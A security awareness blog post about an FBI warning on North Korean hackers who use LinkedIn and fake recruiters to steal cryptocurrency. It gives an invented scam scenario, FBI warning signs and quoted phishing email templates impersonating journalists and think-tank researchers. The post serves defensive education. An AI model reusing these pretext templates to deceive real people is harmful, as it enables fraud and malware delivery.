Read This: How North Korean Threat Actors Can Use LinkedIn to Steal Your Crypto

On September 3rd, the FBI released a warning about North Korean hackers using "Well-Disguised" and sophisticated social engineering techniques to steal cryptocurrency. What's new this time? Let's examine the details.

According to the FBI, here's how these cybercriminals operate:

The hackers begin by researching their victims' social media activity, especially on job related social media networks like LinkedIn. They then use the victim's "background, skills, employment, or business interests to craft customized fictional scenarios designed to be uniquely appealing to the targeted person." That humble-brag post about your latest crypto investment? They saw it. Your skills section boasting about your promotion, thanking your supervisor? They took notes.

While this may seem pretty obvious to many in the security field, the average Joe in finance or management (no offense to anyone in both fields) may have yet to learn this. Remember, these are not simple impersonation attempts. The hackers "impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate". They initiate conversations in fluent English, building trust methodically, and present their malware in a way that appears "natural and non-alerting". The FBI also warns that these threat actors might "use fake images of time-sensitive events to induce immediate action from intended victims." Remember those notes the hypothetical hackers took of you? They're meticulously crafting a persona that's tailor-made to appeal to you.

An example of a scenario

Here's an example of how this scam might play out in the real world. Note: This is just an example, but it illustrates the sophisticated nature of these attacks.

Enter Alex Chen, a senior cybersecurity analyst and crypto investor with over a decade of experience proudly displayed on his LinkedIn profile. Unfortunately, he becomes the target of a sophisticated North Korean hacking operation.

The hackers begin by meticulously studying Alex's LinkedIn profile, noting his interest in AI and his expertise in the latest cybersecurity threats. After gathering more information on Alex from his other social profiles, they create a convincing fake identity: "Sarah Johnson," a recruiter for a fictional AI-driven cybersecurity startup called "NexGen Cyber Defense."

To establish legitimacy, the hackers set up a professional-looking website for NexGen and create several fake employee profiles on LinkedIn. These profiles are carefully curated to have connections within Alex's professional circle. They're building a whole cinematic universe, and Alex is the unsuspecting audience. Sarah then initiates contact with Alex, sending him a seemingly professional DM, and they begin exchanging industry insights and sharing relevant articles to build rapport. It's all so natural; Alex never suspects a thing

It's a slow burn, deliberately so.

Over several weeks or months, Sarah builds trust by using common psychological tactics to build trust (read Influence by Robert Cialdini); she even consistently mentions her firm to Alex. Eventually, she presents an exciting job opportunity to Alex, tailored to his expertise and interests. The critical moment comes when she sends a link to a "confidential job description" that's actually disguised malware. To create urgency, Sarah mentions they're in the final stages of hiring and includes a fake screenshot showing only one interview slot remaining. If Alex hesitates, Sarah follows up with gentle reminders.

What to look out for

Now, I know what you're thinking. "I'm too smart to fall for this." Maybe you are, but let's be real, these scams are ultimately sponsored by the government of North Korea, who intend to use the stolen crypto to fund their nuclear program. They're good and there is a reason they've managed to siphon $3 billion in 5 years. They're good. According to the FBI, here are some specific indicators to watch for:

• Requests to execute code or download applications on company-owned devices or devices with access to a company's internal network.
• Requests to conduct a "pre-employment test" or debugging exercise involving non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
• Unexpected job offers from prominent cryptocurrency or technology firms with unrealistically high compensation and no negotiation.
• Unsolicited investment offers from prominent companies or individuals.
• Insistence on using non-standard or custom software for simple tasks easily achievable through common applications (e.g., video conferencing or connecting to a server).
• Requests to run scripts to enable call or video teleconference functionalities supposedly blocked due to the victim's location.
• Attempts to move professional conversations to other messaging platforms or applications.
• Unsolicited contacts containing unexpected links or attachments.

If you're concerned about being targeted, review the official FBI document and take note of the recommended mitigations. For insight into how these fake sites appear, examine pages 23, 24, 28, 33, 34, 42, and 45 of the DOJ affidavit on the seizure of 12 domains associated with North Korean cyber gangs. It's worth a few seconds of your time, particularly if you work in or invest in the cryptocurrency sector.

Samples of messages from the FBI

You know, it's one thing to talk about these attacks in the abstract, but it's another to see how they actually play out. Let's dive into some real examples that the FBI has uncovered according to their joint advisory from June, 2023. I can imagaine some of you thinking, "These would never work on me", but they're happening right now, targeting real people in the crypto world.

The Journalist Impersonator

Imagine you're a respected think tank researcher, and you receive an email from a well-known journalist. The email might look something like this:

Greetings,

My name is <name of writer>, and I am a writer for <name of legitimate Korean journal
program>.

I am writing to you today because I am currently preparing for a program related to North Korean issues. Professor <name of professor> of <actual Korean university>, whom I contacted earlier, recommended you as an expert on this issue. I would be grateful if you could spare some time to answer a few questions.

Thank you for considering my request. I look forward to hearing from you soon.

Best regards,        

Looks legit, right? The topic is timely, the writing style might seem legit, and it's coming from a journalist you might recognize. The hacker has done their homework, crafting a message that feels authentic and appealing to your expertise.

If you respond, you'll likely get a follow-up with a malicious attachment or link.

Dear <name of expert>,

As promised, I am sending you a questionnaire. It would be greatly appreciated if you could answer each question in 4-5 sentences. Thank you for your cooperation.

Best regards,

@ attached file: [<name of legitimate Korean journal program>] questionnaire.docx        

And just like that, they're in.

The Academic Researcher

These hackers don't just stop at impersonating journalists. They'll pose as South Korean academic scholars too. Check out this example:

Title: <name of legitimate Korean think tank institute> Request for survey

Hello,

I am <name of an academic scholar> from <name of legitimate Korean think tank>.

I am reaching out to ask if you would be willing to participate in a survey on North Korea's nuclear development titled, "A survey on the perception on experts on the advancement of North Korean nuclear weapons and the denuclearization of the Korean Peninsula". Our goal is to find ways to resolve North Korean nuclear issues and achieve denuclearization on the Korean Peninsula. Rest assured that all answers will be kept confidential and used solely for research purpose. As a token of appreciation, we would like to offer 300,000 won to those who participate in the survey. If you're interested in participating, please reply to this message, and we will send you the survey questionnaire. Looking forward to hearing from you soon.

Best regards,        

Now, if you're an expert in this field, this might seem like a golden opportunity. Share your expertise, contribute to important research, and get paid for it? Sounds great! But if you respond, you'll get a follow-up like this:

Title: RE: RE: <name of legitimate Korean think tank institute> Request for survey

Thank you for your response.

We will send you a document form for payment, which includes a personal information usage agreement. If possible, please fill out your affiliation, name, ID number, bank account, and signature, and attach copies of your bankbook and ID card.

Best regards,

P.S. The attached document is password-protected, and I will send you the password in a 'password.txt file'        

And there's the trap. That "password-protected" document? It's malware. And if you open it, you're giving the hackers access to your system.

Read these samples yourself here. Scroll down to page 7 and further to see the first example.

Beware of Trogan Horse apps

But it's not just about email phishing. These hackers are also creating entire fake cryptocurrency applications. They're not just crude knockoffs either - we're talking sophisticated, professional-looking apps with names like "CryptAIS" and "AlticGO".

These apps claim to offer services like AI-based trading or live cryptocurrency prices, and they'll be packadged as slick websites to further legitimize them. But hidden within the code is a function that downloads and executes malicious payloads.

For instance, an app called Esilet was found to be delivering variants of a remote access trojan (also known as a RAT) called Manuscrypt. This trojan can collect system information and execute arbitrary commands, giving the hackers full control over the infected system.

They'll try to build trust with you

What's particularly insidious about these attacks is how patient and methodical they are. The hackers don't just fire off a single email and hope for the best. They play the long game.

This level of social engineering is what makes these attacks so dangerous. It's not just about technical vulnerabilities - it's about exploiting human nature, our desire to connect, to be helpful, to seize opportunities.

Remember, in the world of cryptocurrency, your digital assets are only as secure as your cybersecurity practices. Stay vigilant, stay informed, and don't let the promise of easy money cloud your judgment.